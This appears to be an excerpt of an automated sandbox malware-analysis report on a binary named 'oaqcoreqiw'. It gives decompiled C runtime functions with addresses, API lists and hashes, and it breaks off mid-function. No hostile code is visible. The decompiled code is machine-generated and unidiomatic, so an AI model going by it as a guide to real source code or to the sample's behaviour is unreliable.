                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Item$Text$Dialog$Message
                                                  • String ID: Help$Sorry, no help available
                                                  • API String ID: 3223884555-856071037
                                                  • Opcode ID: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction ID: 28fe9ae9913a805be3ec31335ef15df6bf296d206d16ef08df91510d8753adf1
                                                  • Opcode Fuzzy Hash: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction Fuzzy Hash: 3441A9317903087BF62417ADAC83FBA7AA9E7D4F10F044036F385EE2D4C6E5A9015B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6728 Relevance: 24.1, APIs: 16, Instructions: 92COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010B6728(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr* _t45;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t45 = E010A8C83(8, 1);
					if(_t45 != 0) {
						_t12 = E010A8C83(0xb8, 1);
						 *_t45 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E010A8C83(0x220, 1);
							 *((intOrPtr*)(_t45 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E010B6250( *_t45, 0x10c1da0);
								__eflags = E010B6B48(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
								if(__eflags != 0) {
									_t17 = E010A97EB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
									__eflags = _t17;
									if(_t17 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
										L17:
										return _t45;
									}
									E010A8C4B( *((intOrPtr*)(_t45 + 4)));
									E010AEB5D( *_t45);
									E010AEA03( *_t45);
									E010A8C4B(_t45);
									L15:
									_t45 = 0;
									goto L17;
								}
								E010AEB5D( *_t45);
								E010AEA03( *_t45);
								E010A8C4B(_t45);
								goto L15;
							}
							E010A8C4B( *_t45);
							E010A8C4B(_t45);
							L8:
							goto L3;
						}
						E010A8C4B(_t45);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E010A6117())) = 0xc;
					goto L4;
				}
			}










                                                  0x010b6731
                                                  0x010b6757
                                                  0x00000000
                                                  0x010b6739
                                                  0x010b6744
                                                  0x010b674a
                                                  0x010b6763
                                                  0x010b676a
                                                  0x010b676c
                                                  0x010b676e
                                                  0x010b677f
                                                  0x010b6786
                                                  0x010b6789
                                                  0x010b678b
                                                  0x010b67a4
                                                  0x010b67b9
                                                  0x010b67bb
                                                  0x010b67de
                                                  0x010b67e5
                                                  0x010b67e7
                                                  0x010b680f
                                                  0x010b6811
                                                  0x00000000
                                                  0x010b6811
                                                  0x010b67ec
                                                  0x010b67f3
                                                  0x010b67fa
                                                  0x010b6800
                                                  0x010b6808
                                                  0x010b6808
                                                  0x00000000
                                                  0x010b6808
                                                  0x010b67bf
                                                  0x010b67c6
                                                  0x010b67cc
                                                  0x00000000
                                                  0x010b67d1
                                                  0x010b678f
                                                  0x010b6795
                                                  0x010b6776
                                                  0x00000000
                                                  0x010b6776
                                                  0x010b6771
                                                  0x00000000
                                                  0x010b6771
                                                  0x010b674c
                                                  0x010b6751
                                                  0x00000000
                                                  0x010b6751

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 2661855409-0
                                                  • Opcode ID: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction ID: b6698b5b4b186e8a0a6ae6b62b97c6a8c6a6124a953df3f5ee8031f81c8378b5
                                                  • Opcode Fuzzy Hash: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction Fuzzy Hash: 9F213431045606EAEB223FA8DC48ECEBFE5FF61752B50846EE4C555061FF3398408A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A43D6 Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E010A43D6(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10c3f08);
				_t25 =  *0x10c2140; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E010A8C4B( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x10c2140; // 0x0
				}
				_push(_t14);
				E010A8C4B(_t25);
				_t26 =  *0x10c213c; // 0xf0fb38
				 *0x10c2140 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E010A8C4B( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10c213c; // 0xf0fb38
				}
				E010A8C4B(_t26);
				 *0x10c213c = 0;
				E010A8C4B( *0x10c2138);
				_t5 = E010A8C4B( *0x10c2134);
				 *0x10c2138 = 0;
				 *0x10c2134 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E010A8C4B(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10c3f08 = _t5;
				_t6 =  *0x10c2a50; // 0x0
				if(_t6 != 0) {
					E010A8C4B(_t6);
					 *0x10c2a50 = 0;
				}
				_t7 =  *0x10c2a54; // 0x0
				if(_t7 != 0) {
					E010A8C4B(_t7);
					 *0x10c2a54 = 0;
				}
				_t8 = InterlockedDecrement( *0x10c16fc);
				if(_t8 == 0) {
					_t8 =  *0x10c16fc; // 0xf13230
					if(_t8 != 0x10c19f8) {
						_t9 = E010A8C4B(_t8);
						 *0x10c16fc = 0x10c19f8;
						return _t9;
					}
				}
				return _t8;
			}












                                                  0x010a43d6
                                                  0x010a43de
                                                  0x010a43e4
                                                  0x010a43ea
                                                  0x010a43ee
                                                  0x010a43f0
                                                  0x010a43f7
                                                  0x010a43fd
                                                  0x010a4400
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a4400
                                                  0x010a4402
                                                  0x010a4402
                                                  0x010a4408
                                                  0x010a440a
                                                  0x010a440f
                                                  0x010a4418
                                                  0x010a4420
                                                  0x010a4422
                                                  0x010a4428
                                                  0x010a442e
                                                  0x010a4431
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a4431
                                                  0x010a4433
                                                  0x010a4433
                                                  0x010a443a
                                                  0x010a4445
                                                  0x010a444b
                                                  0x010a4456
                                                  0x010a445e
                                                  0x010a4464
                                                  0x010a446d
                                                  0x010a4470
                                                  0x010a4475
                                                  0x010a4477
                                                  0x010a447d
                                                  0x010a4482
                                                  0x010a4489
                                                  0x010a448c
                                                  0x010a4492
                                                  0x010a4492
                                                  0x010a4498
                                                  0x010a449f
                                                  0x010a44a2
                                                  0x010a44a8
                                                  0x010a44a8
                                                  0x010a44b4
                                                  0x010a44bd
                                                  0x010a44bf
                                                  0x010a44cb
                                                  0x010a44ce
                                                  0x010a44d4
                                                  0x00000000
                                                  0x010a44d4
                                                  0x010a44cb
                                                  0x010a44dc

                                                  APIs
                                                  • DecodePointer.KERNEL32 ref: 010A43DE
                                                  • _free.LIBCMT ref: 010A43F7
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • _free.LIBCMT ref: 010A440A
                                                  • _free.LIBCMT ref: 010A4428
                                                  • _free.LIBCMT ref: 010A443A
                                                  • _free.LIBCMT ref: 010A444B
                                                  • _free.LIBCMT ref: 010A4456
                                                  • _free.LIBCMT ref: 010A4470
                                                  • EncodePointer.KERNEL32(00000000), ref: 010A4477
                                                  • _free.LIBCMT ref: 010A448C
                                                  • _free.LIBCMT ref: 010A44A2
                                                  • InterlockedDecrement.KERNEL32 ref: 010A44B4
                                                  • _free.LIBCMT ref: 010A44CE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                  • String ID:
                                                  • API String ID: 4264854383-0
                                                  • Opcode ID: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction ID: 49cb8943cc238bacaf1c82f7eb73b6b2babcfc6f048d7d3298659976d4d44964
                                                  • Opcode Fuzzy Hash: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction Fuzzy Hash: 88210879801212DFE7386FECF9544463FA4FB55722398816AEAC4E7559CF7E48828F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A7366 Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E010A7366(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0x10bf168);
				E010A61F0(__ebx, __edi, __esi);
				E010A8834(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0x10c2de0 - _t130; // 0xf22f58
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E010A8C83();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0x10c2de0 = _t81;
						 *0x10c2dc0 = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10c2de0; // 0xf22f58
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0x10c2de0;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10c2ee4; // 0xf21ca8
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -17575380
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E010A762A();
							L2:
							_t86 = 1;
							L3:
							return E010A6235(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0x10c2dc0 - _t135; // 0x20
							if(__eflags >= 0) {
								break;
							}
							_t138 = E010A8C83(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0x10c2de0[_t149] = _t138;
								 *0x10c2dc0 =  *0x10c2dc0 + _t141;
								__eflags =  *0x10c2dc0;
								while(1) {
									__eflags = _t138 - 0x10c2de0[_t149] + 0x800;
									if(_t138 >= 0x10c2de0[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0x10c2dc0; // 0x20
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0x10c2de0[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}





























                                                  0x010a7366
                                                  0x010a7368
                                                  0x010a736d
                                                  0x010a7374
                                                  0x010a737a
                                                  0x010a737c
                                                  0x010a737f
                                                  0x010a7385
                                                  0x010a73a5
                                                  0x010a73a9
                                                  0x010a73aa
                                                  0x010a73ab
                                                  0x010a73b2
                                                  0x010a73b4
                                                  0x010a73b7
                                                  0x010a73b9
                                                  0x010a73d2
                                                  0x010a73d7
                                                  0x010a73dd
                                                  0x010a73e2
                                                  0x010a73e4
                                                  0x00000000
                                                  0x00000000
                                                  0x010a73e6
                                                  0x010a73ec
                                                  0x010a73ef
                                                  0x010a73f2
                                                  0x010a73fb
                                                  0x010a73fe
                                                  0x010a7404
                                                  0x010a7407
                                                  0x010a740a
                                                  0x010a740d
                                                  0x010a7410
                                                  0x010a7410
                                                  0x010a741b
                                                  0x010a7421
                                                  0x010a7426
                                                  0x010a7555
                                                  0x010a7555
                                                  0x010a7555
                                                  0x010a7558
                                                  0x010a755b
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7566
                                                  0x010a756c
                                                  0x010a756f
                                                  0x010a7572
                                                  0x010a7587
                                                  0x010a7587
                                                  0x010a758b
                                                  0x010a758d
                                                  0x010a7594
                                                  0x010a7599
                                                  0x010a759b
                                                  0x010a759b
                                                  0x010a758f
                                                  0x010a7591
                                                  0x010a7591
                                                  0x010a75a5
                                                  0x010a75a7
                                                  0x010a75aa
                                                  0x010a75f1
                                                  0x010a75f7
                                                  0x010a75fa
                                                  0x010a7600
                                                  0x010a7605
                                                  0x010a7607
                                                  0x010a760c
                                                  0x010a760c
                                                  0x00000000
                                                  0x010a75ac
                                                  0x010a75ac
                                                  0x010a75ae
                                                  0x00000000
                                                  0x00000000
                                                  0x010a75b1
                                                  0x010a75b7
                                                  0x010a75b9
                                                  0x00000000
                                                  0x00000000
                                                  0x010a75bb
                                                  0x010a75bd
                                                  0x010a75c2
                                                  0x010a75c5
                                                  0x010a75cf
                                                  0x010a75d2
                                                  0x010a75dd
                                                  0x010a75e2
                                                  0x010a75e6
                                                  0x010a75ec
                                                  0x010a7613
                                                  0x010a7613
                                                  0x00000000
                                                  0x010a7613
                                                  0x010a75d8
                                                  0x010a75d8
                                                  0x010a75da
                                                  0x010a75da
                                                  0x00000000
                                                  0x010a75da
                                                  0x010a75cb
                                                  0x00000000
                                                  0x010a75cb
                                                  0x010a75aa
                                                  0x010a7574
                                                  0x010a7577
                                                  0x00000000
                                                  0x00000000
                                                  0x010a757f
                                                  0x00000000
                                                  0x010a757f
                                                  0x010a7619
                                                  0x010a7620
                                                  0x010a739a
                                                  0x010a739c
                                                  0x010a739d
                                                  0x010a73a2
                                                  0x010a73a2
                                                  0x010a742c
                                                  0x010a742f
                                                  0x010a7431
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7437
                                                  0x010a7439
                                                  0x010a743c
                                                  0x010a743f
                                                  0x010a7444
                                                  0x010a744c
                                                  0x010a744e
                                                  0x010a7450
                                                  0x010a7452
                                                  0x010a7452
                                                  0x010a7457
                                                  0x010a7457
                                                  0x010a7458
                                                  0x010a745b
                                                  0x010a745b
                                                  0x010a7461
                                                  0x00000000
                                                  0x00000000
                                                  0x010a746d
                                                  0x010a746f
                                                  0x010a7472
                                                  0x010a7474
                                                  0x010a7508
                                                  0x010a750f
                                                  0x010a750f
                                                  0x010a7515
                                                  0x010a7521
                                                  0x010a7523
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7525
                                                  0x010a752b
                                                  0x010a752e
                                                  0x010a7531
                                                  0x010a7535
                                                  0x010a753b
                                                  0x010a753e
                                                  0x010a7541
                                                  0x010a7544
                                                  0x010a7544
                                                  0x010a7549
                                                  0x010a754a
                                                  0x010a754d
                                                  0x00000000
                                                  0x010a754d
                                                  0x010a747a
                                                  0x010a7480
                                                  0x00000000
                                                  0x010a7480
                                                  0x010a7483
                                                  0x010a7485
                                                  0x010a7488
                                                  0x010a748b
                                                  0x010a748e
                                                  0x010a748e
                                                  0x010a7490
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7496
                                                  0x010a7498
                                                  0x010a749b
                                                  0x010a74f5
                                                  0x010a74f5
                                                  0x010a74f6
                                                  0x010a74fc
                                                  0x010a74fd
                                                  0x010a7500
                                                  0x010a7503
                                                  0x00000000
                                                  0x010a7503
                                                  0x010a749d
                                                  0x010a74a0
                                                  0x00000000
                                                  0x00000000
                                                  0x010a74a2
                                                  0x010a74a4
                                                  0x010a74a6
                                                  0x00000000
                                                  0x00000000
                                                  0x010a74a8
                                                  0x010a74aa
                                                  0x010a74ba
                                                  0x010a74c7
                                                  0x010a74ce
                                                  0x010a74d3
                                                  0x010a74da
                                                  0x010a74e2
                                                  0x010a74e6
                                                  0x010a74ec
                                                  0x010a74ec
                                                  0x010a74ec
                                                  0x010a74ef
                                                  0x010a74f2
                                                  0x010a74f2
                                                  0x00000000
                                                  0x010a74f2
                                                  0x010a74ad
                                                  0x010a74b3
                                                  0x010a74b6
                                                  0x010a74b8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a74b8
                                                  0x00000000
                                                  0x010a748e
                                                  0x010a73c6
                                                  0x010a73ce
                                                  0x00000000
                                                  0x010a73ce
                                                  0x010a7392
                                                  0x00000000

                                                  APIs
                                                  • __lock.LIBCMT ref: 010A7374
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A7392
                                                  • __calloc_crt.LIBCMT ref: 010A73AB
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A73C6
                                                  • GetStartupInfoW.KERNEL32(?,010BF168,00000064), ref: 010A741B
                                                  • __calloc_crt.LIBCMT ref: 010A7466
                                                  • GetFileType.KERNEL32(00000001), ref: 010A74AD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 010A74E6
                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 010A759F
                                                  • GetFileType.KERNEL32(00000000), ref: 010A75B1
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(-010C2DD4,00000FA0), ref: 010A75E6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 301580142-0
                                                  • Opcode ID: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction ID: d1f24fc3699efed2d4afe8025cc911d00276a7615ee5998c638286cda392c291
                                                  • Opcode Fuzzy Hash: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction Fuzzy Hash: B691B3719043468FDB24CFB8C8805ADBFF4AF09325B54866ED4E6AB3C1DB769802CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6818 Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E010B6818(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E010A412F(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E010A4060(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x10bf590);
					E010A61F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t88 = E010A7A00();
						_v36 = _t88;
						E010AEBF8(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E010A8C83(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E010A8834(0xc);
							_v8 = 1;
							E010B6250(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E010B698D();
							_t66 = E010B6B48(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E010AEB5D(_t83);
								_t43 = E010AEA03(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E010BA6E7(_a8, 0x10c1c34);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x10c2d94 = 1;
									}
								}
								E010A8834(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E010AEC74(_t25, _t83);
								E010AEB5D(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x10c1e64 & 0x00000001;
									if(( *0x10c1e64 & 0x00000001) == 0) {
										E010AEC74(0x10c1d9c,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x10c1d9c; // 0x10c1da0
										_t32 = _t77 + 0x84; // 0x10c1e78
										 *0x10c1e70 =  *_t32;
										_t33 = _t77 + 0x90; // 0x10bd700
										 *0x10c1ecc =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x10c1e60 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E010B699C();
							}
						}
						_v8 = 0xfffffffe;
						E010B69CF(_t43, _t88);
						_t45 = _t66;
					} else {
